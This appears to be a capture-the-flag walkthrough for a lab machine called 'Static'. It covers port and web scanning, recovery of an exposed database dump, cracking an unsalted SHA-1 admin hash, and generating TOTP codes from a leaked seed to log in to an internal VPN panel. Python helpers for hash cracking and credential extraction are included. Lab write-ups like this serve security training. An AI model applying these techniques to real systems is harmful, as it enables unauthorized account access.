Static

$ nmap -Pn 10.129.128.160
PORT     STATE SERVICE
22/tcp   open  ssh
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy
$ sudo nmap -p 2222 -T4 -A 10.129.128.160
PORT     STATE SERVICE VERSION
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
(The "EtherNetIP-1" label in the first scan is only nmap's default name for port 2222; version detection shows it is a second OpenSSH instance, on Ubuntu, while the web server on 8080 reports Debian.)
$ sudo nmap -p 8080 -T4 -A 10.129.128.160
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
$ nikto -h http://10.129.128.160:8080
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server banner has changed from 'Apache/2.4.38 (Debian)' to 'Apache/2.4.29 (Ubuntu)' which may suggest a WAF, load balancer or proxy is in place
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/vpn/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ OSVDB-3268: /.ftp_uploads/: Directory indexing found.
+ Entry '/.ftp_uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
$ dirb 10.129.128.160:8080
---- Scanning URL: http://10.129.128.160:8080/ ----
+ http://10.129.128.160:8080/index.php (CODE:200|SIZE:0)
+ http://10.129.128.160:8080/robots.txt (CODE:200|SIZE:55)
+ http://10.129.128.160:8080/server-status (CODE:403|SIZE:281)
$ echo 10.129.129.126 static.htb | sudo tee -a /etc/hosts

OWASP ZAP
http://10.129.128.160:8080/vpn/login.php
curl -i -s -k -X POST \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Referer: http://10.129.128.160:8080/vpn/login.php' \
  -H 'Cookie: PHPSESSID=9agp3nerpthlsbl1rceh72or17' \
  --data-binary 'username=ZAP&password=ZAP&submit=Login' \
  'http://10.129.128.160:8080/vpn/login.php'

http://10.129.128.160:8080/.ftp_uploads/
http://10.129.128.160:8080/robots.txt

User-agent: *
Disallow: /vpn/
Disallow: /.ftp_uploads/

kali@kali:~/0.htb/machines/Static$ file db.sql.gz 
db.sql.gz: gzip compressed data, was "db.sql", last modified: Thu Jun 18 15:43:42 2020, from Unix, original size modulo 2^32 355
kali@kali:~/0.htb/machines/Static$ 

The archive as downloaded has had its LF bytes rewritten to CRLF (the kind of damage an ASCII-mode transfer does to a binary), so gunzip fails on it as-is; dos2unix -f (force, because the file is binary) reverts that first:
kali@kali:~/0.htb/machines/Static/$ dos2unix -f db.sql.gz
kali@kali:~/0.htb/machines/Static/$ gunzip db.sql.gz

kali@kali:~/0.htb/machines/Static/$ cat db.sql 
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) ); 
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
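The repair-and-extract step above, as an added example that is not part of the original notes: it simulates the CRLF damage, undoes it the way `dos2unix -f` does on a binary file, confirms the result by decompressing it (gzip's CRC32 and length trailer catch a bad repair), and pulls the credential row out of the dump. The sample dump is constructed inline to match the recovered db.sql; the function names are this example's own.

```python
# Added example: recover a CRLF-mangled gzip and parse the users INSERT.
import gzip
import re
import zlib

# Constructed sample dump, same shape as the recovered db.sql.
SAMPLE_SQL = (
    "CREATE DATABASE static;\n"
    "USE static;\n"
    "CREATE TABLE users ( id smallint unsigned not null auto_increment, "
    "username varchar(20) not null, password varchar(40) not null, "
    "totp varchar(16) not null, primary key (id) );\n"
    "INSERT INTO users ( id, username, password, totp ) VALUES "
    "( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', "
    "'orxxi4c7orxwwzlo' );\n"
)


def make_sample_gzip() -> bytes:
    """Compress the sample dump (mtime=0 keeps the header deterministic)."""
    return gzip.compress(SAMPLE_SQL.encode(), mtime=0)


def mangle_crlf(data: bytes) -> bytes:
    """Simulate an ASCII-mode transfer: every LF becomes CRLF, even in binary."""
    return data.replace(b"\n", b"\r\n")


def repair_crlf(data: bytes) -> bytes:
    """What `dos2unix -f` does to a binary: collapse every CRLF back to LF.

    Caveat: a genuine 0x0d 0x0a pair in the original stream is collapsed too,
    so only trust the result if the gzip trailer (CRC32 + ISIZE) validates.
    """
    return data.replace(b"\r\n", b"\n")


def try_gunzip(data: bytes):
    """Decompress, returning None on any format/CRC/truncation error."""
    try:
        return gzip.decompress(data)
    except (OSError, EOFError, zlib.error):
        return None


def recover(blob: bytes):
    """Return (needed_repair, plaintext); raise if neither form decompresses."""
    text = try_gunzip(blob)
    if text is not None:
        return False, text
    text = try_gunzip(repair_crlf(blob))
    if text is None:
        raise ValueError("not a valid gzip stream even after CRLF repair")
    return True, text


# Matches the INSERT row in the dump; values are captured as plain strings.
INSERT_RE = re.compile(
    r"INSERT INTO users\s*\(\s*id,\s*username,\s*password,\s*totp\s*\)\s*"
    r"VALUES\s*\(\s*null,\s*'([^']*)',\s*'([^']*)',\s*'([^']*)'\s*\)",
    re.IGNORECASE,
)


def extract_users(sql_text: str):
    """Return a list of {username, password, totp} dicts from the dump."""
    return [
        {"username": u, "password": p, "totp": t}
        for u, p, t in INSERT_RE.findall(sql_text)
    ]


if __name__ == "__main__":
    damaged = mangle_crlf(make_sample_gzip())
    needed_repair, text = recover(damaged)
    print("CRLF repair needed:", needed_repair)
    for row in extract_users(text.decode()):
        print(row)
```

Because `mangle_crlf` inserts a CR before every LF, `repair_crlf` is its exact inverse; in the field you do not get that guarantee, which is why `recover` only reports success when gzip's own trailer check passes.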
cyberchef
d033e22ae348aeb5660fc2140aec35850c4da997
Hash length: 40
Byte length: 20
Bit length:  160

Based on the length, this hash could have been generated by one of the following hashing functions:
SHA-1
SHA-0
FSB-160
HAS-160
HAVAL-160
RIPEMD-160
Tiger-160

kali@kali:~/0.htb/machines/Static$ hashid d033e22ae348aeb5660fc2140aec35850c4da997
Analyzing 'd033e22ae348aeb5660fc2140aec35850c4da997'
[+] SHA-1 
[+] Double SHA-1 
[+] RIPEMD-160 
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn 
[+] Skein-256(160) 
[+] Skein-512(160) 
kali@kali:~/0.htb/machines/Static$ 

kali@kali:~/0.htb/machines/Static$ hash-identifier 
HASH: d033e22ae348aeb5660fc2140aec35850c4da997

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

The hash resolves to "admin": it is plain SHA-1 of the username (the dump stores a bare 40-hex value, no MySQL-style '*' prefix), confirmed locally:

kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1deep
d033e22ae348aeb5660fc2140aec35850c4da997
kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1sum
d033e22ae348aeb5660fc2140aec35850c4da997  -
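What the hashid / hash-identifier step is really doing, as an added example that is not part of the original notes: digest length only narrows the field, so the script tries each unsalted construction that fits the length against a small constructed wordlist, including the MySQL 4.1+ `SHA1(SHA1(pw))` form that hash-identifier listed. Function names are this example's own; the wordlist is constructed inline.

```python
# Added example: length-based hash triage plus a wordlist check.
import hashlib

# Unsalted constructions worth trying for a given hex-digest length.
CANDIDATES = {
    32: ["md5"],
    40: ["sha1", "ripemd160", "mysql5"],
    64: ["sha256"],
    128: ["sha512"],
}


def candidates_for(hexdigest: str):
    """Return the construction names that match the digest length."""
    return CANDIDATES.get(len(hexdigest), [])


def digest(name: str, word: str):
    """Hex digest of `word` under construction `name`, or None if unsupported."""
    raw = word.encode()
    if name == "mysql5":
        # MySQL PASSWORD() since 4.1: SHA1 over the raw SHA1 digest, shown with '*'.
        return hashlib.sha1(hashlib.sha1(raw).digest()).hexdigest()
    if name == "ripemd160":
        try:  # OpenSSL 3 builds may ship it only in the legacy provider.
            return hashlib.new("ripemd160", raw).hexdigest()
        except ValueError:
            return None
    return hashlib.new(name, raw).hexdigest()


def crack(hexdigest: str, wordlist):
    """Return (construction, word) for the first match, else None."""
    target = hexdigest.strip().lstrip("*").lower()
    for name in candidates_for(target):
        for word in wordlist:
            if digest(name, word) == target:
                return name, word
    return None


# Constructed mini wordlist; a real run would stream rockyou or similar.
WORDLIST = ["password", "123456", "admin", "static", "letmein"]

if __name__ == "__main__":
    print(crack("d033e22ae348aeb5660fc2140aec35850c4da997", WORDLIST))
```

The '*' strip matters because MySQL prints its hashes with that prefix while dumps like this one store the bare hex; the column here has no prefix, which is one more reason plain SHA-1 is the first thing to try.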
kali@kali:~/0.htb/machines/Static/$ 
http://10.129.129.90:8080/vpn/login.php
admin / admin
totp.py
#!/usr/bin/env python3
# Print the current TOTP code from the seed in the users table (pip install pyotp).
import pyotp

totp = pyotp.TOTP('orxxi4c7orxwwzlo')  # base32 seed; pyotp accepts it lowercase
print(totp.now())

http://10.129.129.90:8080/vpn/panel.php
Static Inc.
Internal IT Support portal

Form: Common Name = [ text field ]  [Generate]

Server	Address	Status
pub	172.17.0.10	Offline
web	172.20.0.10	Online
db	172.20.0.11	Online
vpn	172.30.0.1	Online
pki	192.168.254.3	Online

Five .ovpn files generated.

